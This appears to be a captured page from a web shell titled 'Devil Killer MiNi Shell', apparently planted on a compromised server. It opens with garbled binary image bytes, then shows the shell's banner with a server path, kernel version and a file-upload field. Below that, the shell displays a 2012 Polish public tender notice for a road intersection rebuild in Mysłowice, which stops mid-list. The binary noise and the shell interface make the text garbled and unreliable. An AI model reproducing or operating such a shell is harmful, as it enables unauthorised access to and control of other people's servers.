JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120723/264912-N-2012.html

<p class="kh_header"><b>Mysłowice: Przebudowa skrzyżowania ulic Katowicka - Bytomska w Mysłowicach - PT + wykonwstawo</b><br>
<b>Numer ogłoszenia: 264912 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Mysłowice , ul. Powstańców 1, 41-400 Mysłowice, woj. śląskie, tel. (032) 3171195, faks (032) 2234075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.myslowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa skrzyżowania ulic Katowicka - Bytomska w Mysłowicach - PT + wykonwstawo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia na zadanie pod nazwą: Przebudowa skrzyżowania ulic Katowicka - Bytomska w Mysłowicach - PT + wykonawstwo jest wykonanie robót budowlanych na podstawie przekazanej przez Zamawiającego dokumentacji projektowej na przebudowę skrzyżowania ulic: Katowickiej położonej w ciągu 
DK 79 i Bytomskiej w Mysłowicach. Zakres rzeczowy obejmuje budowę ronda drogowego, budowę kanalizacji deszczowej, przebudowę oświetlenia ulicznego, zabezpieczenie lub przebudowę urządzeń obcych: kabli elektroenergetycznych, teletechnicznych, sieci gazowej. 
2. Zakres rzeczowy robót budowlanych obejmuje:
2.1) branża drogowa:
2.1.1) wycinka drzew: ścinanie drzew, frezowanie pni, wywiezienie dłużyc i karpiny, oczyszczenie terenu. Drewno z wycinki należy przewieźć do Miejskiego Zarządu Gospodarki Komunalnej w Mysłowicach, ul. Partyzantów 21;
2.1.2) roboty rozbiórkowe: nawierzchni asfaltowej wraz z podbudową, nawierzchni z kostki kamiennej, chodników, krawężników wraz z ławami betonowymi, obrzeży wraz z wywiezieniem gruzu z terenu rozbiórki i utylizacją, rozebranie znaków drogowych wraz z transportem do Miejskiego Przedsiębiorstwa Ulic i Mostów 
w Mysłowicach, ul. Oświęcimska 52. Kostkę granitową z rozbiórki nawierzchni drogowej oraz frez asfaltowy należy przetransportować na plac składowy przy ulicy Wielka Skotnica 39 w Mysłowicach lub wg wskazań inspektora nadzoru; 
2.1.3) roboty ziemne: roboty pomiarowe przy liniowych robotach ziemnych, roboty ziemne mechaniczne i ręczne wraz z transportem urobku na wysypisko wraz z utylizacją, formowanie i zagęszczenie nasypów, wykonanie i zasypanie przekopów kontrolnych;
2.1.4) wykonanie chodników z kostki brukowej betonowej gr. 8 cm kolorowej na podbudowie z kruszywa łamanego;
2.1.5) wyspy rozdzielające: profilowanie podłoża, podbudowa z kruszywa łamanego, nawierzchnia z kostki brukowej betonowej gr. 8 cm;
2.1.6) opaska: profilowanie podłoża, podbudowa z kruszywa łamanego, nawierzchnia z kostki brukowej betonowej gr. 8 cm;
2.1.7) krawężniki: rowki pod obrzeża i krawężniki z wywiezieniem ziemi i utylizacją, ułożenie krawężników kamiennych prostych i łukowych o promieniach zgodnych z projektem wykonawczym na ławie betonowej z oporem, ułożenie obrzeży betonowych na ławie betonowej;
2.1.8) oznakowanie: wykonanie oznakowania pionowego i poziomego cienkowarstwowego zgodnie z projektem docelowej organizacji ruchu;
2.1.9) organizacja ruchu na czas prowadzenia robót - zgodnie z projektem tymczasowej organizacji ruchu w zakresie wykonania, utrzymania i demontażu w okresie realizacji kontraktu;
2.1.10) jezdnia: profilowanie i zagęszczenie podłoża, stabilizacja gruntu cementem, ułożenie geosiatki, warstwa mrozoochronna, podbudowa z kruszywa łamanego, oczyszczenie i skropienie podbudowy, podbudowa z mieszanek mineralno-bitumicznych, oczyszczenie i skropienie, warstwa wiążąca z mieszanek mineralno-bitumicznych grysowych, oczyszczenie i skropienie asfaltem, warstwa ścieralna z mieszanek SMA;
2.1.11) powierzchnie przejezdne: profilowanie i zagęszczenie podłoża, stabilizowanie gruntu cementem, ułożenie geosiatki zgodnie z projektem, warstwa mrozoochronna, podbudowa z kruszywa łamanego, nawierzchnia z kostki granitowej nieregularnej o wys. 14 cm na podsypce cementowo-piaskowej;
2.1.12) odwodnienie: roboty ziemne z transportem urobku i utylizacją, studzienki ściekowe uliczne betonowe o śr. 500 mm z osadnikiem i syfonem, kanały z rur kanalizacyjnych PVC o śr. 200 mm, ręczne czyszczenie studzienek rewizyjnych o średnicach wewnętrznych 1200-1400 mm;
2.1.13) nasadzenia: zgodnie z projektem wykonawczym - Gospodarka zielenią;
2.1.14) roboty inne: humusowanie i obsianie skarp, w tym trawnik z kępami krokusów na wyspie ronda, regulacja pionowa studzienek dla urządzeń podziemnych, obrukowanie powierzchni ronda wyspy, przebrukowanie nawierzchni z kostki betonowej w miejscach połączenia z istniejącą nawierzchnią;
2.1.15) remont istniejącej nawierzchni asfaltowej poprzez frezowanie, oczyszczenie i skropienie asfaltem drogowym, wyrównanie mieszanką mineralno-asfaltową, wykonanie warstwy ścieralnej z mieszanek SMA, oznakowanie poziome cienkowarstwowe;
2.1.16) wykonanie dokumentacji powykonawczej;
2.1.17) wykonanie inwentaryzacji geodezyjnej powykonawczej;
2.1.18) inne roboty budowlane zgodnie z dokumentacją projektową niezbędne do zrealizowania zadania;
2.2) branża sanitarna - odwodnienie:
2.2.1) roboty pomiarowe przy liniowych robotach ziemnych, przygotowanie terenu do robót ziemnych i roboty ziemne wraz z transportem i utylizacją;
2.2.2) przebudowa kanalizacji deszczowej: podłoża z materiałów sypkich, kanały z rur PVC o średnicy 200 mm w wykopach umocnionych, kanały z rur PVC o śr. 315 mm w wykopach umocnionych, izolacja pozioma studzienek, studnie rewizyjne z kręgów betonowych fi 1200 mm, studzienki ściekowe uliczne o średnicy 
500 mm z osadnikiem, sprawdzenie sprawności kanałów rurowych za pomocą kamery, obsypka piaskiem kanałów rurowych;
2.2.3) wykonanie dokumentacji powykonawczej;
2.2.4) wykonanie inwentaryzacji geodezyjnej powykonawczej;
2.2.5) inne roboty budowlane zgodnie z dokumentacją projektową niezbędne do zrealizowania zadania;
2.3) branża sanitarna - część gazowa:
2.3.1) roboty pomiarowe, przygotowanie terenu do robót zimnych i roboty ziemne wraz z transportem nadmiaru ziemi i elementów rozbiórkowych i utylizacją;
2.3.2) przebudowa gazociągu niskoprężnego stalowego - zgodnie z projektem;
2.3.3) wykonanie dokumentacji powykonawczej;
2.3.4) wykonanie inwentaryzacji geodezyjnej powykonawczej;
2.3.5) inne roboty budowlane zgodnie z dokumentacją projektową niezbędne do zrealizowania zadania;
2.4) branża energetyczna:
2.4.1) roboty przygotowawcze: wytyczenie trasy linii kablowej;
2.4.2) roboty ziemne: wykonanie wykopów kontrolnych, kopanie rowów dla linii kablowej, zasypanie wykopów kontrolnych, zabezpieczenie obcego uzbrojenia na trasie kablowej;
2.4.3) wykonanie podsypki piaskowej, układanie kabli nN, układanie kabli SN, układanie bednarki, układanie taśmy ostrzegawczej;
2.4.4) montaż fundamentów, montaż słupów, montaż uziomów szpilkowych, montaż wysięgników, montaż opraw sodowych 150 W, montaż źródeł światła, montaż tabliczek bezpiecznikowych w słupach, montaż ZK-1;
2.4.5) wykonanie muf kablowych;
2.4.6) znakowanie i opisanie kabli znacznikami plastikowymi;
2.4.7) badania, próby i pomiary linii oraz prace rozruchowo - regulacyjne;
2.4.8) plantowanie i czyszczenie terenu, wywiezienie nadmiaru gruntu i gruzu wraz z utylizacją;
2.4.9) wykonanie inwentaryzacji i pomiarów geodezyjnych powykonawczych;
2.4.10) wykonanie dokumentacji powykonawczej;
2.4.11) inne prace niezbędne dla wykonania linii kablowej i oświetlenia ulicznego;
2.5) branża teletechniczna: 
2.5.1) wytyczenie trasy przebudowy kanalizacji teletechnicznej;  
2.5.2) wykonanie i zasypanie wykopów kontrolnych, kopanie wykopu pod kanalizację teletechniczną;
2.5.3) zabezpieczenie obcego uzbrojenia na trasie kanalizacji teletechnicznej;
2.5.4) wykonanie kanalizacji teletechnicznej, zabudowa studni teletechnicznych, montaż kabli teletechnicznych miedzianych, montaż kabli światłowodowych, wykonanie muf na kablach teletechnicznych miedzianych, wykonanie muf na kablach światłowodowych;
2.5.5) znakowanie i opisanie kabli znacznikami plastikowymi;
2.5.6) badania, próby i pomiary;
2.5.7) plantowanie i czyszczenie terenu, wywiezienie nadmiaru gruntu i gruzu wraz z utylizacją;
2.5.8) wykonanie inwentaryzacji i pomiarów geodezyjnych powykonawczych;
2.5.9) wykonanie dokumentacji powykonawczej;
2.5.10) inne prace niezbędne dla wykonania przebudowy sieci teletechnicznej. 
3. Informacje ustalające warunki wykonania inwestycji w zakresie kanalizacji deszczowej, rur osłonowych na gazociągu w pasie drogowym ulicy Katowickiej i ulicy Bytomskiej w Mysłowicach w odniesieniu do rozwiązań projektowych przedstawionych przez projektanta:
3.1) termin rozpoczęcia robót należy zgłosić z dwutygodniowym wyprzedzeniem do wszystkich gestorów sieci celem zapewnienia nadzoru specjalistycznego budowy w pasie drogowym, jak i poza pasem, zgodnie z wydanymi uzgodnieniami; 
3.2) przed przystąpieniem do robót ziemnych należy przy udziale użytkownika uzbrojenia, wytyczyć przebieg istniejącego uzbrojenia w terenie i ustalić warunki prowadzenia robót w jego rejonie;
3.3) wszystkie prace kanalizacyjne powinny być prowadzone pod nadzorem pracowników dozoru MPWiK Sp. z o.o. w Mysłowicach, ul. Fabryczna 10, posiadających stosowne uprawnienia;
3.4) niezinwentaryzowane i czynne przyłącza kanalizacyjne odkryte w trakcie realizacji powyższej inwestycji należy podłączyć do zaprojektowanej sieci. Wszelkie odstępstwa od dokumentacji związane z kolizją budowanej sieci z uzbrojeniem podziemnym odkrytym w trakcie prowadzenia robót należy ustalić z projektantem oraz poinformować gestorów tych sieci; 
3.5) po zakończeniu prac montażowych przed zasypką, wykonanie kanalizacji deszczowej należy zgłosić Inspektorowi Nadzoru MPWiK celem dokonania odbioru technicznego; 
3.6) jako zasadę przyjmuje się wymóg, iż w ofercie należy przyjąć stosowanie urządzeń spełniających normy i parametry techniczne wyspecyfikowane w dokumentacji projektowej, w tym w szczegółowych specyfikacjach technicznych wykonania i odbioru robót, nie gorsze w zakresie parametrów technicznych i jakościowych od urządzeń wskazanych w tej dokumentacji technicznej. Przedmiar robót ma charakter pomocniczy w wycenie robót do przedmiotowej oferty; 
3.7) wykonawca jest zobowiązany do wykonania badań zagęszczenia gruntu po trasie przebiegu sieci kanalizacyjnej po wykonaniu robót budowlanych i uzyskaniu stosownych wskaźników zagęszczenia określonych w dokumentacji. 
4. Wykonawca zrealizuje przedmiot zamówienia zgodnie z dokumentacją projektową, w tym szczegółowymi specyfikacjami technicznymi wykonania i odbioru robót - zał. nr 8 do siwz.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany do wniesienia wadium w wysokości 50.000,00 PLN (słownie: pięćdziesiąt tysięcy złotych 00/100).
2. Wadium może być wniesione w jednej lub kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j.: Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3. Wadium wnoszone w formie pieniężnej należy wpłacić wyłącznie przelewem na rachunek bankowy: Urząd Miasta Mysłowice - ING Bank Śląski S.A., nr 13 1050 1214 1000 0023 5654 6974. Wadium musi znajdować się na koncie Zamawiającego w terminie określonym uPzp, przy czym wykonawca poprzez załączenie do składanej oferty dowodu wpłaty wykazuje Zamawiającemu, że wpłacenie nastąpiło w czasie niezbędnym do spełnienia wcześniej określonego wymogu.
4. Oryginał wadium, wniesionego w formie niepieniężnej łącznie z pisemną dyspozycją wykonawcy o wyłączeniu tegoż dokumentu z oferty po zaistnieniu podstaw do zwrotu wadium, należy dołączyć do oferty.
5. Wadium wniesione w innej formie niż w pieniądzu winno zawierać bezwarunkowe i nieodwołalne zobowiązanie podmiotu udzielającego gwarancji lub poręczenia wypłaty kwoty wadium na każde żądanie Zamawiającego w wypadkach wymienionych w art. 46 ust. 4a i 5 ustawy, przy czym warunki automatycznego i całkowitego wygaśnięcia wadium wniesionego w formie niepieniężnej nie mogą być sprzeczne z ustawą Prawo zamówień publicznych, bowiem w sytuacji wspomnianej sprzeczności z ustawą Prawo zamówień publicznych wadium nie będzie zabezpieczać oferty w sposób prawem przewidziany.
6. Wadium wnoszone w pieniądzu zachowuje ważność przez cały okres jego przechowywania na rachunku bankowym. Wadium wnoszone w formie niepieniężnej musi być ważne co najmniej od dnia, w którym przypada termin składania ofert, do dnia, w którym upływa termin związania ofertą (jeżeli przypada na dzień ustawowo wolny od pracy, to do pierwszego dnia następującego po dniu ustawowo wolnym od pracy).
7. Zamawiający zatrzyma wadium wraz z odsetkami w przypadku zaistnienia okoliczności, o których mowa w art. 46 ust. 4a i 5 ustawy.
8. Zwrot, a także ponowne wniesienie wadium następuje wg przepisów ustawy Prawo zamówień publicznych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykazanie, że wykonawca wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane, tj. każdą w zakresie budowy lub przebudowy drogi publicznej lub dróg publicznych o nawierzchni asfaltowej (drogi publicznej lub dróg publicznych w rozumieniu przepisów ustawy z dnia 21 marca 1985 r. o drogach publicznych - t.j.: Dz. U. z 2007 r. Nr 19, poz. 115 z późn. zm.) - każdą o wartości (netto) nie mniejszej niż 800.000,00 PLN (słownie: osiemset tysięcy złotych 00/100),
w przypadku wykazania wartości w walucie obcej, dla oceny spełniania ww. warunku udziału w postępowaniu Zamawiający przyjmie iloczyn wykazanej wartości i średniego kursu tej waluty, określonego przez Narodowy Bank Polski w dniu wszczęcia postępowania o udzielenie niniejszego zamówienia,
w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania ww. warunku udziału w postępowaniu sumowaniu podlega wiedza i doświadczenie ww. wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/osobami/ posiadającą/ymi/ uprawnienia budowlane do kierowania robotami budowlanymi w specjalności: 
- drogowej (pełniącą funkcję kierownika budowy), 
- instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych (pełniącą funkcję kierownika robót),
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (pełniącą funkcję kierownika robót)
lub posiadającą/ymi/ odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które upoważniają do pełnienia tej/tych/ funkcji, a także bedącą/ymi/ członkiem/ami/ właściwej izby samorządu zawodowego
albo wykazanie, że wykonawca dysponuje lub będzie dysponował osobą/osobami/ posiadającą/ymi/ odpowiadające ww. uprawnieniom kwalifikacje zawodowe, które zostały uznane na zasadach określonych w przepisach odrębnych,
w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania ww. warunku udziału w postępowaniu sumowaniu podlega potencjał osobowy ww. wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wykazanie, że wykonawca posiada środki finansowe na rachunku lub zdolność kredytową w kwocie nie mniejszej niż 1.000.000,00 PLN (słownie: jeden milion złotych 00/100),
w przypadku wykazania kwoty w walucie obcej, dla oceny spełniania ww. warunku udziału w postępowaniu Zamawiający przyjmie iloczyn wykazanej kwoty i średniego kursu tej waluty, określonego przez Narodowy Bank Polski w dniu wszczęcia postępowania o udzielenie niniejszego zamówienia,
- wykazanie, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wysokości sumy ubezpieczenia nie mniejszej niż 500.000,00 PLN (słownie: pięćset tysięcy złotych 00/100),
w przypadku wykazania sumy ubezpieczenia w walucie obcej, dla oceny spełniania ww. warunku udziału w postępowaniu Zamawiający przyjmie, iż sumą ubezpieczenia jest iloczyn wykazanej sumy ubezpieczenia i średniego kursu tej waluty, określonego przez Narodowy Bank Polski w dniu wszczęcia postępowania 
o udzielenie niniejszego zamówienia,
w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dla oceny spełniania ww. warunku udziału w postępowaniu sumowaniu podlega potencjał ekonomiczny i finansowy ww. wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
